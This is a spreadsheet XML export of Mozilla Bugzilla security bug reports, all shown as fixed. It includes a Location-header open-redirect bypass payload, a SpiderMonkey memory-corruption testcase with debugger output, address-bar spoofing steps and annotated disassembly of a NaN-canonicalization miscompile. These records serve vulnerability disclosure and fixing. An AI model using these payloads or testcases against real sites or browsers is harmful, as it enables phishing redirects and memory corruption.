      <c r="F1643" t="n">
        <v>1</v>
      </c>
      <c r="G1643" t="n">
        <v>3</v>
      </c>
      <c r="H1643" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1643" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1643" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1643" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1643" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1643" t="inlineStr">
        <is>
          <t>[adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q1643" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1643" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T1643" t="n">
        <v>1</v>
      </c>
      <c r="U1643" t="n">
        <v>0</v>
      </c>
      <c r="V1643" t="n">
        <v>25</v>
      </c>
      <c r="W1643" t="inlineStr">
        <is>
          <t>Created attachment 8382965
Testcase
Remember bug 859892, MSVC miscompiling the CanonicalizeNaN call in DataView.getFloat32? I fixed that bug but MSVC is still miscompiling CanonicalizeNaN.
Bug 939562 enables the JITs for more chrome code and this Win32 PGO bug is causing Jetpack crashes, but the reduced testcase also crashes a normal Nightly.
MSVC turns the CanonicalizeNaN call for DataView.getFloat64 into a no-op, so JS code can create arbitrary Values and this is sec-critical.
For CanonicalizeNaN, MSVC with PGO generates the following code, annotated:
  // Prologue.
  mozjs!JS::CanonicalizeNaN:
  680ef5f0 55              push    ebp
  680ef5f1 8bec            mov     ebp,esp
  680ef5f3 83ec0c          sub     esp,0Ch
  // Move the double argument to ebp-8. Also save esi and set it to 0.
  680ef5f6 dd4508          fld     qword ptr [ebp+8]
  680ef5f9 56              push    esi
  680ef5fa 33f6            xor     esi,esi
  680ef5fc dd5df8          fstp    qword ptr [ebp-8]
  // Compare esi and if it's non-zero, we're done.
  // We just zero'ed esi so this branch is never taken.
  680ef5ff 3bf6            cmp     esi,esi
  680ef601 7513            jne     mozjs!JS::CanonicalizeNaN+0x26 (680ef616)
  // mozilla::IsNaN does (bits &amp; DoubleExponentBits) == DoubleExponentBits,
  // so this looks reasonable. If this test fails, we're done.
  680ef603 8b45fc          mov     eax,dword ptr [ebp-4]
  680ef606 250000f07f      and     eax,7FF00000h
  680ef60b 3d0000f07f      cmp     eax,7FF00000h
  680ef610 0f849b911900    je      mozjs!JS::CanonicalizeNaN+0x1991c1 (682887b1)
  // Done, return the double and restore esi.
  680ef616 dd4508          fld     qword ptr [ebp+8]
  680ef619 5e              pop     esi
  680ef61a c9              leave
  680ef61b c3              ret
The branch that's always taken is a bit weird for an opt build, but so far so good. Here's what happens when we have a NaN value and jump to 682887b1:
  // Load the high word in edx, low word in eax.
  682887b1 8b55fc          mov     edx,dword ptr [ebp-4]
  682887b4 8b45f8          mov     eax,dword ptr [ebp-8]
  // mozilla::IsNaN does: (bits &amp; DoubleSignificandBits) != 0
  // DoubleSignificandBits == 0x000fffff ffffffff, so the and instruction below
  // makes some sense.
  682887b7 81e2ffff0f00    and     edx,0FFFFFh
  // The code below is totally bogus, we "or" both words, but whatever
  // happens we jump to "Done." and return the original input.
  682887bd 0bc2            or      eax,edx
  682887bf 0f84516ee6ff    je      mozjs!JS::CanonicalizeNaN+0x26 (680ef616)
  682887c5 e94c6ee6ff      jmp     mozjs!JS::CanonicalizeNaN+0x26 (680ef616)</t>
        </is>
      </c>
      <c r="X1643" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" t="n">
        <v>1704420</v>
      </c>
      <c r="B1644" t="inlineStr">
        <is>
          <t>2021-04-11 21:57:05 -0700</t>
        </is>
      </c>
      <c r="C1644" t="inlineStr">
        <is>
          <t>Address Bar Spoofing due to Arabic RTL characters (fix domain highlighting)</t>
        </is>
      </c>
      <c r="D1644" t="inlineStr">
        <is>
          <t>2024-06-12 05:39:01 -0700</t>
        </is>
      </c>
      <c r="E1644" t="n">
        <v>1</v>
      </c>
      <c r="F1644" t="n">
        <v>1</v>
      </c>
      <c r="G1644" t="n">
        <v>2</v>
      </c>
      <c r="H1644" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1644" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1644" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K1644" t="inlineStr">
        <is>
          <t>Firefox 87</t>
        </is>
      </c>
      <c r="L1644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1644" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1644" t="inlineStr">
        <is>
          <t>[adv-main115+]</t>
        </is>
      </c>
      <c r="Q1644" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1644" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1644" t="inlineStr">
        <is>
          <t>115 Branch</t>
        </is>
      </c>
      <c r="T1644" t="n">
        <v>1</v>
      </c>
      <c r="U1644" t="n">
        <v>0</v>
      </c>
      <c r="V1644" t="n">
        <v>47</v>
      </c>
      <c r="W1644" t="inlineStr">
        <is>
          <t>Created attachment 9215016
firefox-desktop-PoC.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Steps to reproduce:
Tested on:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
STEP 1: Click on "run" in attached file ("firefox-desktop-PoC.html")
The address bar will point to "www.mozilla.org", however the actual content is being delivered by "اختبار.اختبار"
The URL is not handled properly. Arabic characters in the domain name are being rendered from Right to Left(RTL) direction rather than Left to Right(LTR).
Actual results:
http://www.mozilla.org/hello/1/index.html/رابتخا.رابتخا
Expected results:
http://اختبار.اختبار/www.mozilla.org/hello/1/index.html
The address bar should point to "اختبار.اختبار" instead of "www.mozilla.org"</t>
        </is>
      </c>
      <c r="X1644" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" t="n">
        <v>1211871</v>
      </c>
      <c r="B1645" t="inlineStr">
        <is>
          <t>2015-10-06 06:09:12 -0700</t>
        </is>
      </c>
      <c r="C1645" t="inlineStr">
        <is>
          <t>Certain escaped characters in host of Location-header are being treated as non-escaped</t>
        </is>
      </c>
      <c r="D1645" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:08 -0700</t>
        </is>
      </c>
      <c r="E1645" t="n">
        <v>1</v>
      </c>
      <c r="F1645" t="n">
        <v>1</v>
      </c>
      <c r="G1645" t="n">
        <v>3</v>
      </c>
      <c r="H1645" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1645" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1645" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1645" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1645" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q1645" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1645" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1645" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T1645" t="n">
        <v>1</v>
      </c>
      <c r="U1645" t="n">
        <v>0</v>
      </c>
      <c r="V1645" t="n">
        <v>22</v>
      </c>
      <c r="W1645" t="inlineStr">
        <is>
          <t>Created attachment 8670212
SuccessWithLocationRedirect.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Steps to reproduce:
I've identified that the latest version of Aurora 41 (Both on PC and Mac, 41.0.1) is treating URLs with escaped characters in the host of the Location header differently than previous versions.
Actual results:
The following header:
Location: http://example.com%0a%23.google.com/
Would in earlier versions result in an error. However in 41 it's actually redirecting you to http://example.com
In simple PHP code this means:
&lt;? header("Location: http://example.com%0a%23.google.com/");
I have attached an image showing the Location-header of my test URL which resulted in a redirect to example.com
I've identified this issue on a couple of websites that do care about preventing Open Redirect issues (mostly because of non secured OAuth implementations using response_type=token, such as Facebook Connect). 
Previously these companies have been covered by the fact that the escaped characters in the subdomain of a host are throwing an error, but since Firefox now treats the characters differently, and sends the user to example.com, this is obviously not enough anymore for preventing an open redirect in Firefox.
Expected results:
I've checked the same redirect in IE, Chrome, Safari and earlier version of Firefox and this issue is not present in any of those browsers, they are either sending the user to the subdomain to Google.com (which is not a valid one of course) or resulting in an error. If I'm reading the RFC properly, these characters are not valid parts of a host thus an error is the correct way of handling a Location-header like this.
What's interesting here also is that this form of redirect to example.com is only possible through the Location-header. Both meta and javascript-redirects are resulting in an error instead.</t>
        </is>
      </c>
      <c r="X1645" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" t="n">
        <v>639885</v>
      </c>
      <c r="B1646" t="inlineStr">
        <is>
          <t>2011-03-08 10:00:18 -0800</t>
        </is>
      </c>
      <c r="C1646" t="inlineStr">
        <is>
          <t>Crash [@ memmove ] via mozilla::layers::ReadbackManagerD3D10::ProcessTasks</t>
        </is>
      </c>
      <c r="D1646" t="inlineStr">
        <is>
          <t>2013-12-27 14:26:44 -0800</t>
        </is>
      </c>
      <c r="E1646" t="n">
        <v>1</v>
      </c>
      <c r="F1646" t="n">
        <v>1</v>
      </c>
      <c r="G1646" t="n">
        <v>3</v>
      </c>
      <c r="H1646" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1646" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1646" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1646" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1646" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1646" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1646" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1646" t="inlineStr">
        <is>
          <t>[sg:moderate][fx4-rc-ridealong] requires two instances of Firefox</t>
        </is>
      </c>
      <c r="Q1646" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1646" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1646" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1646" t="n">
        <v>1</v>
      </c>
      <c r="U1646" t="n">
        <v>0</v>
      </c>
      <c r="V1646" t="n">
        <v>72</v>
      </c>
      <c r="W1646" t="inlineStr">
        <is>
          <t>I hit this crash three times in the past two days:
 	mozcrt19.dll!memmove(unsigned char * dst=0x67e23fa0, unsigned char * src=0x67e23fa4, unsigned long count=4294967292)  Line 188	Asm
 	xul.dll!nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::ShiftData(unsigned int start=0, unsigned int oldLen=0, unsigned int newLen=0, unsigned int elemSize=4)  Line 180 + 0xd bytes	C++
 	xul.dll!nsTArray&lt;nsAutoPtr&lt;mozilla::layers::ReadbackTask&gt;,nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int start=1736935553, unsigned int count=1)  Line 836	C++
 	xul.dll!nsTArray&lt;nsAutoPtr&lt;mozilla::layers::ReadbackTask&gt;,nsTArrayDefaultAllocator&gt;::RemoveElementAt(unsigned int index=1736935646)  Line 841	C++
&gt;	xul.dll!mozilla::layers::ReadbackManagerD3D10::ProcessTasks()  Line 232	C++
 	xul.dll!mozilla::layers::StartTaskThread(void * aManager=0x124f7730)  Line 135	C++
 	kernel32.dll!@BaseThreadInitThunk@12()  + 0x12 bytes	
 	ntdll.dll!___RtlUserThreadStart@8()  + 0x27 bytes	
 	ntdll.dll!__RtlUserThreadStart@8()  + 0x1b bytes	
The worst part is that before we crash, the memmove manages to overwrite a static member variable that Breakpad needs to function properly, so the exception handler crashes, so you just get a Windows crash dialog instead of our crash reporter.
All three times I managed to reproduce this I had another instance of Firefox running (with -no-remote). I hit it twice today under those circumstances. (The second time I attached a debugger and set a data breakpoint, which is how I determined that the member variable was being overwritten here.)</t>
        </is>
      </c>
      <c r="X1646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" t="n">
        <v>1158851</v>
      </c>
      <c r="B1647" t="inlineStr">
        <is>
          <t>2015-04-27 08:22:19 -0700</t>
        </is>
      </c>
      <c r="C1647" t="inlineStr">
        <is>
          <t>External links should open in new tab/window</t>
        </is>
      </c>
      <c r="D1647" t="inlineStr">
        <is>
          <t>2015-05-01 13:23:51 -0700</t>
        </is>
      </c>
      <c r="E1647" t="n">
        <v>1</v>
      </c>
      <c r="F1647" t="n">
        <v>1</v>
      </c>
      <c r="G1647" t="n">
        <v>5</v>
      </c>
      <c r="H1647" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1647" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J1647" t="inlineStr">
        <is>
          <t>Shape of the Web</t>
        </is>
      </c>
      <c r="K1647" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1647" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1647" t="inlineStr">
        <is>
          <t xml:space="preserve">[kb=1665494] </t>
        </is>
      </c>
      <c r="Q1647" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1647" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1647" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1647" t="n">
        <v>1</v>
      </c>
      <c r="U1647" t="n">
        <v>0</v>
      </c>
      <c r="V1647" t="n">
        <v>2</v>
      </c>
      <c r="W1647" t="inlineStr">
        <is>
          <t>Links to external sites should always open in a new tab/window, such as those from issue modal.</t>
        </is>
      </c>
      <c r="X1647" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" t="n">
        <v>614499</v>
      </c>
      <c r="B1648" t="inlineStr">
        <is>
          <t>2010-11-24 00:16:23 -0800</t>
        </is>
      </c>
      <c r="C1648" t="inlineStr">
        <is>
          <t>Crash [@ nsSHTransaction::GetPrev ]</t>
        </is>
      </c>
      <c r="D1648" t="inlineStr">
        <is>
          <t>2011-06-20 18:08:56 -0700</t>
        </is>
      </c>
      <c r="E1648" t="n">
        <v>1</v>
      </c>
      <c r="F1648" t="n">
        <v>1</v>
      </c>
      <c r="G1648" t="n">
        <v>3</v>
      </c>
      <c r="H1648" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1648" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1648" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1648" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1648" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1648" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1648" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1648" t="inlineStr">
        <is>
          <t>[sg:critical] testcase doesn't affect &lt; FF4 [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1648" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1648" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1648" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1648" t="n">
        <v>1</v>
      </c>
      <c r="U1648" t="n">
        <v>0</v>
      </c>
      <c r="V1648" t="n">
        <v>27</v>
      </c>
      <c r="W1648" t="inlineStr">
        <is>
          <t>Created attachment 492931
testcase (crashes Firefox when loaded)
This might be the same bug as topcrash bug 612881 / bug 612887.</t>
        </is>
      </c>
      <c r="X1648" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" t="n">
        <v>1433697</v>
      </c>
      <c r="B1649" t="inlineStr">
        <is>
          <t>2018-01-27 13:50:04 -0800</t>
        </is>
      </c>
      <c r="C1649" t="inlineStr">
        <is>
          <t>Handle deletions that don't exist on one side when merging synced bookmarks</t>
        </is>
      </c>
      <c r="D1649" t="inlineStr">
        <is>
          <t>2018-01-30 02:20:10 -0800</t>
        </is>
      </c>
      <c r="E1649" t="n">
        <v>1</v>
      </c>
      <c r="F1649" t="n">
        <v>1</v>
      </c>
      <c r="G1649" t="n">
        <v>2</v>
      </c>
      <c r="H1649" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1649" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1649" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1649" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1649" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1649" t="inlineStr"/>
      <c r="Q1649" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1649" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1649" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T1649" t="n">
        <v>1</v>
      </c>
      <c r="U1649" t="n">
        <v>0</v>
      </c>
      <c r="V1649" t="n">
        <v>9</v>
      </c>
      <c r="W1649" t="inlineStr">
        <is>
          <t>On a first sync, the server will likely have tombstones for items that don't exist locally. Our `subsumes` check is overzealous, and complains that those remote tombstones aren't mentioned in the merged tree...which is correct, but expected in this case.
I think we'll want to add remaining local deletions that aren't already mentioned in the merged tree to `deleteRemotely`, and remaining remote deletions to `deleteLocally`.
With this fixed, I can sync my tree. \o/</t>
        </is>
      </c>
      <c r="X1649" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" t="n">
        <v>754242</v>
      </c>
      <c r="B1650" t="inlineStr">
        <is>
          <t>2012-05-11 05:37:07 -0700</t>
        </is>
      </c>
      <c r="C1650" t="inlineStr">
        <is>
          <t>Assertion failure: incBitmap.isMarked(cell, BLACK), at jsgc.cpp:3125 Crash [@ js::HeapPtr&lt;js::BaseShape, unsigned int&gt;::operator] or Crash [@ getCode]</t>
        </is>
      </c>
      <c r="D1650" t="inlineStr">
        <is>
          <t>2013-01-14 08:37:18 -0800</t>
        </is>
      </c>
      <c r="E1650" t="n">
        <v>1</v>
      </c>
      <c r="F1650" t="n">
        <v>1</v>
      </c>
      <c r="G1650" t="n">
        <v>3</v>
      </c>
      <c r="H1650" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1650" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1650" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1650" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1650" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1650" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1650" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1650" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1650" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1650" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1650" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T1650" t="n">
        <v>1</v>
      </c>
      <c r="U1650" t="n">
        <v>0</v>
      </c>
      <c r="V1650" t="n">
        <v>9</v>
      </c>
      <c r="W1650" t="inlineStr">
        <is>
          <t>Created attachment 623110
Log for opt-build Valgrind errors
The following test asserts/crashes/shows Valgrind errors on mozilla-central revision 4c6d01c92dcc (options -m -n -a):
var g1 = newGlobal('new-compartment');
schedulegc(g1);
gcslice(0);
function testEq(b) {
    var a = deserialize(serialize(b));
}
testEq(Array(1024).join(Array(1024).join((false))));
After stepping through the assertion I get this crash on the debug build:
Program received signal SIGSEGV, Segmentation fault.
0x0805aad4 in js::HeapPtr&lt;js::BaseShape, unsigned int&gt;::operator js::BaseShape* (this=0xdadadada) at ../../gc/Barrier.h:212
212         operator T*() const { return value; }
(gdb) bt 8
#0  0x0805aad4 in js::HeapPtr&lt;js::BaseShape, unsigned int&gt;::operator js::BaseShape* (this=0xdadadada) at ../../gc/Barrier.h:212
#1  0x0804d24d in js::Shape::base (this=0xdadadada) at ../../jsscope.h:708
#2  0x0804d18f in js::Shape::getObjectClass (this=0xdadadada) at ../../jsscope.h:607
#3  0x0804e269 in js::ObjectImpl::getClass (this=0xf7503040) at ../../vm/ObjectImpl-inl.h:245
#4  0x0804e27d in js::ObjectImpl::hasClass (this=0xf7503040, c=0x85dabe0) at ../../vm/ObjectImpl-inl.h:257
#5  0x0805fdf1 in JSObject::isWith (this=0xf7503040) at ../../jsobjinlines.h:817
#6  0x081472c5 in js::IsActiveWithOrBlock (cx=0x861dd80, obj=..., stackDepth=0) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:947
#7  0x0814b898 in js::Interpret (cx=0x861dd80, entryFrame=0xf7702020, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:1890
More interesting however is the behavior on opt-builds. In GDB I get this crash:
Program received signal SIGSEGV, Segmentation fault.
getCode (cx=0x8360a68, script=0xf75060f8, pc=0x836b785 ":", rval=...) at ../jsanalyze.h:958
958         Bytecode&amp; getCode(const jsbytecode *pc) { return getCode(pc - script-&gt;code); }
(gdb) bt 8
#0  getCode (cx=0x8360a68, script=0xf75060f8, pc=0x836b785 ":", rval=...) at ../jsanalyze.h:958
#1  bytecodeTypes (cx=0x8360a68, script=0xf75060f8, pc=0x836b785 ":", rval=...) at ../jsanalyze.h:984
#2  js::types::TypeMonitorResult (cx=0x8360a68, script=0xf75060f8, pc=0x836b785 ":", rval=...) at /srv/repos/mozilla-central/js/src/jsinfer.cpp:4966
#3  0x080c65e7 in Monitor (cx=0x8360a68, entryFrame=0xf7702020, interpMode=js::JSINTERP_NORMAL) at ../jsinferinlines.h:622
#4  js::Interpret (cx=0x8360a68, entryFrame=0xf7702020, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:1915
#5  0x081d6e69 in js::mjit::EnterMethodJIT (cx=0x8360a68, fp=0xf7702020, code=0xf74cf050, stackLimit=0xf7ae2000, partial=false) at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:1074
#6  0x081d6fc3 in CheckStackAndEnterMethodJIT (cx=0x8360a68, partial=false) at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:1109
#7  js::mjit::JaegerShot (cx=0x8360a68, partial=false) at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:1121
and on Valgrind I see lots of errors with the opt-build indicating some corruption (see attached Valgrind log). Marking s-s because of that until investigated.</t>
        </is>
      </c>
      <c r="X1650" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" t="n">
        <v>1773717</v>
      </c>
      <c r="B1651" t="inlineStr">
        <is>
          <t>2022-06-10 08:41:33 -0700</t>
        </is>
      </c>
      <c r="C1651" t="inlineStr">
        <is>
          <t>Block ms-msdt and search-ms protocols to prevent security issues</t>
        </is>
      </c>
      <c r="D1651" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:25 -0800</t>
        </is>
      </c>
      <c r="E1651" t="n">
        <v>1</v>
      </c>
      <c r="F1651" t="n">
        <v>1</v>
      </c>
      <c r="G1651" t="n">
        <v>2</v>
      </c>
      <c r="H1651" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1651" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1651" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1651" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1651" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1651" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1651" t="inlineStr">
        <is>
          <t>[adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q1651" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1651" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1651" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T1651" t="n">
        <v>1</v>
      </c>
      <c r="U1651" t="n">
        <v>0</v>
      </c>
      <c r="V1651" t="n">
        <v>21</v>
      </c>
      <c r="W1651" t="inlineStr">
        <is>
          <t>See https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/amp/ .</t>
        </is>
      </c>
      <c r="X1651" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" t="n">
        <v>1358190</v>
      </c>
      <c r="B1652" t="inlineStr">
        <is>
          <t>2017-04-20 09:49:18 -0700</t>
        </is>
      </c>
      <c r="C1652" t="inlineStr">
        <is>
          <t>Looping video keeps fullscreening itself if you try playing it inline</t>
        </is>
      </c>
      <c r="D1652" t="inlineStr">
        <is>
          <t>2017-04-26 08:38:24 -0700</t>
        </is>
      </c>
      <c r="E1652" t="n">
        <v>1</v>
      </c>
      <c r="F1652" t="n">
        <v>1</v>
      </c>
      <c r="G1652" t="n">
        <v>2</v>
      </c>
      <c r="H1652" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1652" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1652" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K1652" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1652" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1652" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1652" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1652" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q1652" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1652" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1652" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1652" t="n">
        <v>1</v>
      </c>
      <c r="U1652" t="n">
        <v>0</v>
      </c>
      <c r="V1652" t="n">
        <v>6</v>
      </c>
      <c r="W1652" t="inlineStr">
        <is>
          <t>This one is kind of hard to describe. So I'll just explain the steps. This is an issue that a few people have been complaining about in the App Store reviews. 
Visit https://gfycat.com/WelcomeGraveBantamrooster
press play to view the video full screen. 
use the pinch gesture to minimize the video. 
